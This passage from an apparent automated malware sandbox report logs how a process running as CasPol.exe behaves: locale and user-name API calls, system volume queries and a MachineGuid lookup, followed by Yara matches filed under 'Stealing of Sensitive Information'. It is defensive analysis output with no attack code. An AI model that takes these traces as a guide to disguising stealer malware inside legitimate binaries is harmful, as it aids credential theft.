                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\5f
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\40^
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\W
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\*
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\L
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\.
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\7Y
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager;
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\h
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\'
                        Source: CasPol.exe, 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmp, logs.dat.12.drBinary or memory string: [Program Manager]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433E0A cpuid 12_2_00433E0A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E679
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004470AE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004510BA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512EA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_00447597
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450CF7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D42
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450DDD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00448057
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4186207219.000000000244F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000669000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4182814346.0000000000650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
